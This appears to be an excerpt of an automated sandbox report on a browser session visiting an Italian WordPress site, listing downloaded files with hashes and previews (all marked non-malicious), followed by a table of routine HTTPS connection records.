                                                                                                                                          MD5:A9FD1225FB2CD32320E2B931DCA01089
                                                                                                                                          SHA1:44EC5C6A868B4CE62350D9F040ED8E18F7A1D128
                                                                                                                                          SHA-256:C5DD43F53F3AF822CBF17B1FB75F46192CDBD51724F277ACF6CF0DACB3FD57E7
                                                                                                                                          SHA-512:58F45066D5738B1EF1F431EB9FC911FC9E6F61F60538F1577CD2EBE651BD8E7B87124DAE36C4E66FB303FD249EBA333BF41D316774201948CAD056BB0E4B4F2E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.woff2
                                                                                                                                          Preview:wOF2......1X..........0..K.$....................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u...m......6.........f%...N\!7.....w!......K..~.....DP)..V.u].5a..dQT1..#.bIIL&L=.....z....}4E.8..`..-..8..?....Xk.C..mV..`&...D."...V.c'.)......"/ .AD.4...i..S)e.72..@D "....~.Jj...~...so7r.....TK...P6..m5.>....1...=x...~.....mD...&.....4/.#[...v.U.,.3.O[aoy......f|.gKL..d.....e...P......c.j........H..../+d..Z....@.._....8.yk.0p.._~..g.C.:{..u.......h..n...I..%..#aD..$@....... ......'..G.89.*n...*._q.~....+]..uvX.r..!~n...7r.7*.9..6..7...`....=..j..~.:.......y..P.[.Q.7.../....J..j..B[`KliY.-m,.i..6.eW..^u]W7..qu.r..K.N..O..i9`H..0.!0.6............d..f......e.!,..oK....N:..-..X}..."....]..........j2....8.f5/b..n5..V.......d.C.....a.d!..,.../00).{y9V.W!..o.S.<..B>...mhH..%...X.....m~&....&.i.)`rS...."l..d......I.....B....;2Cb.SD........F..s.Z.S.Acb-.C.@..vj....=..Si...... .........i}._m..v.L..x..K.j_.v........]y...WV.B-{}1..E.9.{...9\.. .H..:svr..E_..q....._w...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (48664)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48944
                                                                                                                                          Entropy (8bit):5.272507874206726
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 300 x 111, 8-bit gray+alpha, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):7011
                                                                                                                                          Entropy (8bit):7.935210982848998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:CxXFQdsu4YBwJBzxdIKKZII9PCa62NKPtafT:YXqsK2bIZ020PtmT
                                                                                                                                          MD5:27196EA6F987680715A40244DDA19B07
                                                                                                                                          SHA1:3027961AD138D2BD7D8D5240B90B038B05886429
                                                                                                                                          SHA-256:A8C5ABCE0B585B75FE9BDCF1F3255F9070A657C8F3ED4BB3FA82EEF54E4DAA9B
                                                                                                                                          SHA-512:57FB64FD046379FBB8E6CBEFB8FC621F2CBFBFD33D1843CDA66803E01BC0CDC0F9BDD97AF6F056930FF276CB273379268F979A3AE9B9B047D4EA6BD88F1D9614
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR...,...o.......5....*IDATx..w`.....M....IGA....QC..*E..i*%.B/..j(RE.O. .&>."....,O......,....%...3.{wg...v..3g.1b$..T...........#.,#.,#.,#F.XF.XF.XF...........1`.1`.1`.1b.2b.2b.2b.e.e.e.H6...D#.2.q<N2.."W.z.8z.C.!..D.|...z.*W,.<....f....~..tI`1...#....%.......C.g.1...~..<........4.?.,7}.......C..-.N%*2..".f..U..,..I..l...|....3....5.y|.....].....8..Q.9A^T.....!?K.......[..>.#YD....u..?.X.o.......c;...+.F.!r..".M,}...p..AQ.E..i...5..X{IP2.....{....+.."t.g..>......Km....t.7..y""$8.W.3......j....22...z%j....l..&.~T.!7....W.X..K4.,.Y.T.1.rZ..l._J..@.l....<<.L.|.SM......T.9.M.%Bcm.+..].y.J+......'.Pn..!.Uj.u.f6E...c. g6?.C8......M..[ B+...l=gM...KD.^............"..|.......Ia..y.m...L.k.."...a..t-E..[G./.....{..C...........b~......8n.a<.......Q......r1..Df..%........K...s.r..V....n..1`..M.By...D(.d.",....RNg.........D...L.K.X..y.."T#.....[.r.[..<..m-'..h....f....../k#F..t.&"E.y.....&n..ZR6.`-...I.......
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):8074
                                                                                                                                          Entropy (8bit):4.253803575663342
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:B25NReIHosBA8bKSMahKSXf+39O3zlD5C+swhRWiru:BmrVPhD/D3y
                                                                                                                                          MD5:E3317D55AD904D30EA400A2DA2A56686
                                                                                                                                          SHA1:B998595F2C96F76BA65A808AC4029D66021195B4
                                                                                                                                          SHA-256:ECAC4FC801141CE552220BE4BB12969E2EE625E2CF08CF0EDBAC579A279B28F1
                                                                                                                                          SHA-512:DA9EE673041BD35EA7891EB08831E371CE8929484EAD6CA23E4B3ADBC96D20326955F265F4FAC7B1FE7889E90117564AEC63A10E62FBBE200F494D999B7F6834
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1
                                                                                                                                          Preview:var wpcf7_redirect;..(function ($) {. function Wpcf7_redirect() {. this.init = function () {. this.wpcf7_redirect_mailsent_handler();. };.. this.wpcf7_redirect_mailsent_handler = function () {.. document.addEventListener('wpcf7mailsent', function (event) {.. $(document.body).trigger('wpcf7r-mailsent', [event]);.. if (typeof event.detail.apiResponse != 'undefined' && event.detail.apiResponse) {. var apiResponse = event.detail.apiResponse;. var actionDelay = 0;.. //handle api response. if (typeof apiResponse.api_url_request != 'undefined' && apiResponse.api_url_request) {. wpcf7_redirect.handle_api_action(apiResponse.api_url_request);. }.. //handle api response. if (typeof apiResponse.api_json_xml_request != 'undefined' && apiResponse.api_json_xml_request) {.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x111, components 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):8887
                                                                                                                                          Entropy (8bit):7.929094937109068
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Iz743fPSpWVpH/NQjKFfEP6WIAa9AvtdeokV3:Iz7SfP+q1QjKA6sdeokZ
                                                                                                                                          MD5:5D0B53894B5144174959F16050107FCF
                                                                                                                                          SHA1:467A0DE1745E2136F87901A323AA9DBF38B91FA5
                                                                                                                                          SHA-256:C9046D7BB44221611231CBE078AFB27CD0244474BE1A4F13047F9FCD93536BB5
                                                                                                                                          SHA-512:21AE3BAA2E39CF2C1B27EF7C7136BD3075619CAF3E7AA008BB7D9421FBED634B70DE33EBF39AB2B2E0D0921C683DF10C1F32497C6BDDDAB91EEB8E0F4E708BB1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg
                                                                                                                                          Preview:......JFIF.............C....................................................................C.......................................................................o.,............................................C............................!1.".2ABQ..#3RSabq.7r..C....4cs.$u....................................?.........................!1Aa."2BQ....q...#4Rbr.........$3Cc.............?.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(5.Ct..B.m2.E..m*#....0..H....mUm....@..<._q.......XO*8..L.d*d..|Kp..U"R-..._ea_.........M.Dp3.N.....?"......UQ.U67...Q.\.'.}...I.U@P(5}ms...q.:M....#b.9.T'W...pq.#Y/..H.......h.'./../....$..v....Wh...."..N..W...5W..L~..._...o.Z.n..<6.E.M......q...s...E.>.....Rz.*.f.%.[.I..g..^..].@.PDJ.:v..6..ra..E.....B.0.....e....}.i...K......b,i......d.j./q%J....~Kc.kW....N.O.V.2."..uL..J..=p.....qSi.U6......K.._Y.......YR...)..C.'.]v....%.....Q...#.D.)...Q...ohgmn.Kx
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14181)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14265
                                                                                                                                          Entropy (8bit):5.155891752872181
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:EOuDc2EytQAYZFPg9HN46W/rI9kWkaFaKYS6STFuT9eei:E6rD/rI9kqa66cFuT9e1
                                                                                                                                          MD5:2EBF0D88E73A9C8D5E6D55A1A1CECA01
                                                                                                                                          SHA1:962359C8CD63A3F8436171AD46D97D9F29ABAC4D
                                                                                                                                          SHA-256:2B26394AAC8199778CD337D8046535B6EA9CB2DC698E4102029CA963E080E19F
                                                                                                                                          SHA-512:AAE1C2A7759B04D9302DF61431DF8AC01020A55BA426EE4C9DCB906965E00AB7E073108902AFDFA3EA2AAD128E8FE50A126C8C086DED6FC441EB75BE126ACE06
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(22),u=n(10),c=r(u);c.Axios=s,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefined"==typeof e}functi
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x250, components 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):41754
                                                                                                                                          Entropy (8bit):7.986394788765706
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:I+qlO75tcF+pwew7AgrV+u4Scp5X9dnzH6rhuko0HI9SPjC222N0:I+S+g+aTAYV+uJcp1zObiSP9N0
                                                                                                                                          MD5:5E509D3399ADF6D21F8A5807B7B3C886
                                                                                                                                          SHA1:D863E9E8C49D7794A95A4A7BDF005D1E5C35B78E
                                                                                                                                          SHA-256:E2D956F28E455F0D1EC1509D8E0155BB0CCB55273A911202045EE1E01D75CEE4
                                                                                                                                          SHA-512:50DAB00649007AE4DC8B460A888F84A9A0D193EC8A8AA24B00ACB6C0CB17AD5B6A5315A7BFA2B541FBC391373708018B055BA5118A48D77FFB72B6C30C3AA17D
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0001_02.jpg
                                                                                                                                          Preview:......JFIF.............C....................................................................C..............................................................................................................................................................d.R._%...JET......A!...(..) W....Z...U%A..(U....../......@+X....Z.........(..h....C..98.R...CJ.#...?%bD.jSF...lx3D3.@q...:.\ ...<^..](T....\C.T.m)^.(.A.V.rD#xV.X2c.{"...t..&..B....S#..B....W#.S.yT4.-.....%rD$JD.C].....[.jW.c\...;.nawt@)~....+o..D.....>k.M.C....a\..M/G...bMA.....h.673......RmvuC:...si.E....d..J..9h...q..+.)...9%.="`.1...'....o1..#.Q.fz.wa!._[15....>m..i.fjh...Mg...3..T....I.B.;nq..8..0..a.nX.3L.?.5.[..r.F...}...X..y5.......Uv.AT..rd.]...GH......z..+.g.....u..IM\.R?M8Ir.tka{>s.9~.6.8....[.e].:..x.X....<.f..ZB@..HM......q.t...W .i.L,....e...>24.......gG.;..G..*..5&..ls2.f..|....`4...+\."...u.p.M..M..-..m.....R.v...z9i&..h-.%=.g.@Y.[^S.&al0s4...zI...u(.Q..O......V$.`@.4.-..H.1.K.5../
                                                                                                                                          No static file info
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 28, 2024 11:31:51.621381998 CET49675443192.168.2.4173.222.162.32
                                                                                                                                          Nov 28, 2024 11:32:01.270669937 CET49675443192.168.2.4173.222.162.32
                                                                                                                                          Nov 28, 2024 11:32:05.088913918 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:05.088937998 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:05.089014053 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:05.089256048 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:05.089267015 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:05.925564051 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:05.925600052 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:05.925685883 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:05.927294970 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:05.927320004 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.878005028 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.878294945 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:06.878314972 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.879273891 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.879339933 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:06.880448103 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:06.880518913 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.932554007 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:06.932563066 CET44349738142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:06.979427099 CET49738443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:32:07.313210011 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.313407898 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.320735931 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.320758104 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.321304083 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.372733116 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.380739927 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.423358917 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.530353069 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.530380964 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.530406952 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.530452013 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.530518055 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.530534983 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.531042099 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.531058073 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.531085014 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:07.531095982 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.830703974 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.830777884 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.830924034 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.830961943 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.830991983 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.830991983 CET49739443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.831001997 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.831011057 CET4434973923.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.877742052 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.877825022 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.877974033 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.878257990 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:07.878295898 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.176341057 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.176713943 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.176734924 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.177825928 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.177898884 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.178664923 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.180864096 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.180881023 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.181984901 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.182048082 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.182483912 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.182554960 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.182780981 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.182809114 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.183726072 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.183788061 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.229260921 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.229262114 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.229269981 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.229270935 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.275362968 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.275366068 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.588944912 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.589030027 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.589096069 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.589354992 CET49741443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:32:09.589365005 CET44349741167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:10.445075989 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:10.445115089 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:10.445179939 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:10.445364952 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:10.445374966 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.041239023 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.041582108 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.041599989 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.042596102 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.042659044 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.043678045 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.043735981 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.043874979 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.043883085 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.086601973 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.869247913 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869273901 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869287014 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869301081 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869340897 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869344950 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.869366884 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.869398117 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.869424105 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.946856022 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.946873903 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.946966887 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:12.946980953 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.947017908 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.071224928 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.071266890 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.071408987 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.071633101 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.071665049 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.071717978 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.072179079 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.072189093 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.072386980 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.072401047 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.074409962 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.074429035 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.074487925 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.074496031 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.074537992 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.133219004 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.133234978 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.133292913 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.133310080 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.133362055 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.182781935 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.182797909 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.182853937 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.182861090 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.182915926 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.247771978 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.247787952 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.247831106 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.247839928 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.247870922 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.247894049 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.303157091 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.303179026 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.303220034 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.303231001 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.303286076 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.327896118 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.327919006 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.327960014 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.327967882 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.328003883 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.345499039 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.345515966 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.345573902 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.345587015 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.345633030 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.366019011 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.366039991 CET44349743118.27.122.26192.168.2.4
